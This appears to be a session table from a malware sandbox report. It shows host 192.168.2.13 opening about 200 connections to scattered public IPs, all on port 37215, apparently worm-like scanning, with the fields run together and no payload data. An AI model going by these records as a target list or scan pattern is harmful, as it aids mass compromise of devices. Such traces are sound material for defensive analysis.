                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18780192.168.2.1355196208.96.85.8637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18781192.168.2.1352238157.109.76.19937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18782192.168.2.134014684.99.128.9237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18783192.168.2.1345234157.221.235.22237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18784192.168.2.135637041.16.128.14237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18785192.168.2.1348404157.89.208.15737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18786192.168.2.134156641.214.211.22937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18787192.168.2.1353168197.130.179.7237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18788192.168.2.1351054197.229.120.5437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18789192.168.2.135634635.169.148.24037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18790192.168.2.135480031.49.71.4037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18791192.168.2.134028841.55.218.2937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18792192.168.2.1350708157.15.74.1937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18793192.168.2.1344150157.214.138.16737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18794192.168.2.1348464197.133.49.21137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18795192.168.2.1355664197.39.51.8837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18796192.168.2.1333666197.127.63.10837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18797192.168.2.134942041.27.118.13737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18798192.168.2.135862441.139.40.20637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18799192.168.2.1349716197.90.7.25137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18800192.168.2.133461041.174.150.15137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18801192.168.2.1341576157.126.193.12637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18802192.168.2.1347168157.150.221.6837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18803192.168.2.135053241.201.76.837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18804192.168.2.1355428197.114.88.1737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18805192.168.2.1353204197.0.83.4637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18806192.168.2.134848241.36.167.7837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18807192.168.2.1351602157.157.95.13037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18808192.168.2.1356952157.80.87.20837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18809192.168.2.134484041.181.196.10337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18810192.168.2.1355028197.97.161.17337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18811192.168.2.1354688157.96.27.937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18812192.168.2.1350702197.227.137.20737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18813192.168.2.1355020197.62.56.337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18814192.168.2.1349918197.12.7.11637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18815192.168.2.135692041.53.87.17237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18816192.168.2.1352760197.133.99.16837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18817192.168.2.1350618197.76.101.23337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18818192.168.2.1336354157.211.62.21237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18819192.168.2.133571041.104.104.10137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18820192.168.2.1344800197.142.234.10437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18821192.168.2.1357050157.192.214.11037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18822192.168.2.135467241.108.50.17637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18823192.168.2.1346682197.112.40.15037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18824192.168.2.1342688197.232.37.11937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18825192.168.2.1358110157.114.156.9937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18826192.168.2.1349426157.231.238.7137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18827192.168.2.1333698197.152.182.8737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18828192.168.2.133564441.179.32.17637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18829192.168.2.134115841.60.90.437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18830192.168.2.1350814101.104.102.22137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18831192.168.2.1339880157.184.211.16437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18832192.168.2.1345206197.234.64.24437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18833192.168.2.134674248.188.187.13637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18834192.168.2.1352532157.193.201.16937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18835192.168.2.1360318157.116.237.4337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18836192.168.2.1346714197.231.103.13637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18837192.168.2.1344672157.247.208.16237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18838192.168.2.1359080197.136.120.22037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18839192.168.2.1341382134.48.213.5737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18840192.168.2.134692441.163.167.8137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18841192.168.2.1357916197.103.59.13837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18842192.168.2.1335502157.215.200.11537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18843192.168.2.1352398130.58.71.1337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18844192.168.2.1346180157.180.41.7537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18845192.168.2.135788241.134.26.25337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18846192.168.2.1339500157.230.234.24037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18847192.168.2.1334750157.97.64.4437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18848192.168.2.134284841.79.216.10937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18849192.168.2.1333192197.151.193.4137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18850192.168.2.135523841.63.130.5837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18851192.168.2.1341394157.112.21.16437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18852192.168.2.1351854157.108.171.18237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18853192.168.2.1360594197.247.16.20537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18854192.168.2.1359230157.213.68.2437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18855192.168.2.133428041.148.28.13637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18856192.168.2.1341542197.127.88.9237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18857192.168.2.1354378167.183.211.4837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18858192.168.2.1354772197.228.39.1337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18859192.168.2.1336564197.219.122.4137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18860192.168.2.1344378180.171.242.15837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18861192.168.2.1357264197.49.201.1937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18862192.168.2.135239041.140.239.5537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18863192.168.2.1356946197.93.118.7237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18864192.168.2.134757641.224.153.21837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18865192.168.2.133557041.55.134.23437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18866192.168.2.135620841.136.89.21337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18867192.168.2.1340688197.185.106.24437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18868192.168.2.1347816157.165.95.7637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18869192.168.2.135113467.240.42.17737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18870192.168.2.134387085.198.18.24137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18871192.168.2.133400041.52.69.19037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18872192.168.2.1334190157.92.115.1237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18873192.168.2.1340168154.10.53.14637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18874192.168.2.135195241.59.94.24737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18875192.168.2.134431041.84.40.13637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18876192.168.2.135996041.232.191.19637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18877192.168.2.1347632197.175.226.17737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18878192.168.2.1346550160.2.31.11137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18879192.168.2.1337970157.30.27.2637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18880192.168.2.135330441.92.242.17137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18881192.168.2.1339718217.44.75.16237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18882192.168.2.13381988.28.113.18737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18883192.168.2.1360386197.37.221.4137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18884192.168.2.1352172111.199.75.037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18885192.168.2.134067041.207.248.21937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18886192.168.2.133335641.222.151.17237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18887192.168.2.1349718157.139.191.23137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18888192.168.2.1355212157.55.160.1437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18889192.168.2.133390441.125.82.21337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18890192.168.2.1359974157.206.158.14237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18891192.168.2.1356378197.170.148.6737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18892192.168.2.135629241.123.152.12537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18893192.168.2.1356388157.10.160.17337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18894192.168.2.1336578197.136.27.4737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18895192.168.2.1344280184.68.207.6137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18896192.168.2.1360246114.7.8.9437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18897192.168.2.1358070197.219.39.8937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18898192.168.2.135501841.79.91.18537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18899192.168.2.133910041.132.53.2137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18900192.168.2.134905858.45.224.7537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18901192.168.2.1345020188.64.234.13737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18902192.168.2.1354606157.221.166.21237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18903192.168.2.135416285.36.138.12537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18904192.168.2.133471241.179.94.22437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18905192.168.2.1356056197.159.209.21937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18906192.168.2.1334240197.88.3.7337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18907192.168.2.1360708157.154.191.13237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18908192.168.2.1341176157.66.51.137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18909192.168.2.1344556157.131.28.16537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18910192.168.2.13396102.92.221.18537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18911192.168.2.135279241.117.143.15537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18912192.168.2.134803241.224.52.21137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18913192.168.2.1335670208.189.84.23037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18914192.168.2.134954041.140.7.18237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18915192.168.2.1352782197.251.133.10437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18916192.168.2.13530641.251.59.25237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18917192.168.2.1351288197.44.109.4237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18918192.168.2.1337018197.150.88.15237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18919192.168.2.1352342157.253.11.8837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18920192.168.2.1355952157.72.140.6437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18921192.168.2.1343360197.251.9.3437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18922192.168.2.1340640197.217.70.24737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18923192.168.2.134618641.100.200.3137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18924192.168.2.1352364222.46.180.22237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18925192.168.2.1357510157.51.213.22137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18926192.168.2.1358690197.179.209.2937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18927192.168.2.135702641.4.151.13837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18928192.168.2.1339704197.212.111.3837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18929192.168.2.1345158197.18.95.13237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18930192.168.2.133538041.155.16.12737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18931192.168.2.1357812150.161.48.4937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18932192.168.2.134668841.229.20.18637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18933192.168.2.133992441.36.53.21937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18934192.168.2.135692444.84.254.3737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18935192.168.2.1352074157.31.172.18837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18936192.168.2.1356902197.184.83.24737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18937192.168.2.133994841.164.220.11437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18938192.168.2.133481041.177.110.3937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18939192.168.2.135023441.1.139.13937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18940192.168.2.1341410197.155.181.12137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18941192.168.2.1360938197.109.126.20537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18942192.168.2.1347090197.20.29.23337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18943192.168.2.1359932197.115.192.5837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18944192.168.2.1338844197.242.145.6137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18945192.168.2.1335502157.30.65.2137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18946192.168.2.1348130217.175.83.17137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18947192.168.2.133851069.217.36.11437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18948192.168.2.1359158203.155.225.8737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18949192.168.2.133843041.77.66.24037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18950192.168.2.1340654166.2.116.13437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18951192.168.2.133945041.89.153.14937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18952192.168.2.1352506157.127.46.6437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18953192.168.2.133513041.239.202.1137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18954192.168.2.13435949.48.76.537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18955192.168.2.1360444157.252.252.5937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18956192.168.2.133297841.127.3.14237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18957192.168.2.1356436197.179.92.3037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18958192.168.2.1344020142.176.106.5137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18959192.168.2.1357268157.32.116.6237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18960192.168.2.134539641.71.236.3037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18961192.168.2.1347286109.249.161.24937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18962192.168.2.1350680197.163.205.22937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18963192.168.2.134731841.104.60.6837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18964192.168.2.1347564195.51.131.6237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18965192.168.2.1345110109.151.85.12237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18966192.168.2.133991841.36.231.22437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18967192.168.2.1343632197.99.27.2937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18968192.168.2.1338380157.228.47.7237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18969192.168.2.133414041.185.119.21337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18970192.168.2.1351936197.98.8.20837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18971192.168.2.1354254197.117.159.6537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18972192.168.2.135466641.85.144.16337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18973192.168.2.134881241.198.178.19237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18974192.168.2.1347166157.175.213.9837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18975192.168.2.133861441.251.254.17337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18976192.168.2.1358080157.71.220.4637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18977192.168.2.1347138157.197.164.20437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18978192.168.2.1350660197.215.221.19037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18979192.168.2.1334914157.103.40.4837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18980192.168.2.1350790139.206.191.1737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18981192.168.2.134193041.88.229.18137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18982192.168.2.1337078157.3.231.14037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18983192.168.2.1346836160.59.64.7337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18984192.168.2.1335382197.65.236.20037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18985192.168.2.1342410197.205.19.23337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18986192.168.2.1349490121.70.206.2637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18987192.168.2.133648013.72.173.3137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18988192.168.2.133555641.0.125.16137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
